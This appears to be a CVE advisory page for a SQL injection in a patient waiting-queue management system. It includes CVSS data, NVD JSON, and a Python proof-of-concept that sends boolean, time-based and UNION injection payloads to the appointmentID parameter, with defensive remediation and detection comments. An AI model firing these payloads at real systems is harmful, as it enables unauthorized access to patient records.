Security Vulnerability Report
CVE-2025-64081 CVSS 9.8 CRITICAL

CVE-2025-64081

Published: 2025-12-08 18:15:53
Last Modified: 2025-12-08 22:15:53

Description

SQL injection vulnerability in /php/api_patient_schedule.php in SourceCodester Patients Waiting Area Queue Management System v1 allows attackers to execute arbitrary SQL commands via the appointmentID parameter.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:pamzey:patients_waiting_area_queue_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
SourceCodester Patients Waiting Area Queue Management System v1.0
SourceCodester Patients Waiting Area Queue Management System v1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
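# CVE-2025-64081 SQL Injection PoC
# Target: SourceCodester Patients Waiting Area Queue Management System v1
# File: /php/api_patient_schedule.php
# Parameter: appointmentID
#
# Reviewer notes (defensive context):
# - The weakness class is CWE-89: the appointmentID value reaches a SQL
#   statement without being neutralised. The PHP source is not shown here, so
#   the exact query is unknown; the usual durable fix is to bind the value in
#   a prepared statement and, if the ID is meant to be numeric, reject
#   anything that is not an integer before the query runs.
# - For detection, review web-server or WAF logs for requests to
#   /php/api_patient_schedule.php whose appointmentID contains quote
#   characters, SLEEP( or UNION SELECT, which are the shapes this script sends.

import sys
import time

import requests

# Constructed placeholder on the reserved ".example" TLD (RFC 2606). The
# original default pointed at a registered third-party domain, so running the
# script with no argument would have sent the payloads to an unrelated site.
target = "http://target.example"  # Replace with actual target URL
endpoint = "/php/api_patient_schedule.php"


def test_sql_injection(url, param_name):
    """Probe *url* for SQL injection through the query parameter *param_name*.

    Sends three kinds of GET request (boolean-based, time-based, UNION-based)
    and prints what came back. Nothing is returned; every result is an
    indicator printed to stdout, and request failures are reported rather
    than raised.

    Args:
        url: Full URL of the endpoint to request.
        param_name: Name of the query-string parameter that carries the payload.
    """
    # Basic SQL injection test - Boolean based
    true_payload = "' OR '1'='1"   # Should return all records
    false_payload = "' OR '1'='2"  # Should return no records or error

    # Time-based blind SQL injection for MySQL
    time_payload = "' AND SLEEP(5)-- -"

    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
    }

    print("[*] Testing CVE-2025-64081 SQL Injection...")

    # Test 1: Boolean-based injection
    print("\n[*] Test 1: Boolean-based injection")
    params_true = {param_name: true_payload}
    params_false = {param_name: false_payload}

    try:
        resp_true = requests.get(url, params=params_true, headers=headers, timeout=10)
        resp_false = requests.get(url, params=params_false, headers=headers, timeout=10)

        print(f"[+] True payload response length: {len(resp_true.text)}")
        print(f"[+] False payload response length: {len(resp_false.text)}")

        # A length difference is only a hint: pages with dynamic content
        # (timestamps, tokens) can differ in size between any two requests.
        if len(resp_true.text) != len(resp_false.text):
            print("[!] Potential SQL injection detected!")
    except requests.RequestException as e:
        print(f"[-] Error: {e}")

    # Test 2: Time-based blind SQL injection
    print("\n[*] Test 2: Time-based blind SQL injection")
    params_time = {param_name: time_payload}

    try:
        start = time.time()
        requests.get(url, params=params_time, headers=headers, timeout=15)
        elapsed = time.time() - start

        print(f"[+] Response time: {elapsed:.2f}s")

        # No baseline request is timed, so a slow network or a loaded server
        # can also cross the 5 s threshold; confirm any hit by other means.
        if elapsed >= 5:
            print("[!] Time delay detected - SQL injection confirmed!")
    except requests.RequestException as e:
        print(f"[-] Error: {e}")

    # Test 3: Database version extraction using UNION injection
    print("\n[*] Test 3: Database enumeration")
    union_payload = "' UNION SELECT NULL,NULL,VERSION(),NULL,NULL-- -"
    params_union = {param_name: union_payload}

    try:
        resp_union = requests.get(url, params=params_union, headers=headers, timeout=10)
        # Only the first 500 characters of the body are echoed.
        print(f"[+] UNION injection response: {resp_union.text[:500]}")
    except requests.RequestException as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    # An optional first command-line argument overrides the placeholder target.
    if len(sys.argv) > 1:
        target = sys.argv[1]

    url = f"{target}{endpoint}"
    test_sql_injection(url, "appointmentID")

    print("\n[*] PoC completed")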

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64081", "sourceIdentifier": "[email protected]", "published": "2025-12-08T18:15:52.720", "lastModified": "2025-12-08T22:15:52.810", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "SQL injection vulnerability in /php/api_patient_schedule.php in SourceCodester Patients Waiting Area Queue Management System v1 allows attackers to execute arbitrary SQL commands via the appointmentID parameter."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pamzey:patients_waiting_area_queue_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "69FC38AE-BCD1-4A41-B2E0-CE3DEE703691"}]}]}], "references": [{"url": 
"https://packetstorm.news/files/id/211592", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.sourcecodester.com/php/18348/patients-waiting-area-queue-management-system.html", "source": "[email protected]", "tags": ["Product"]}]}}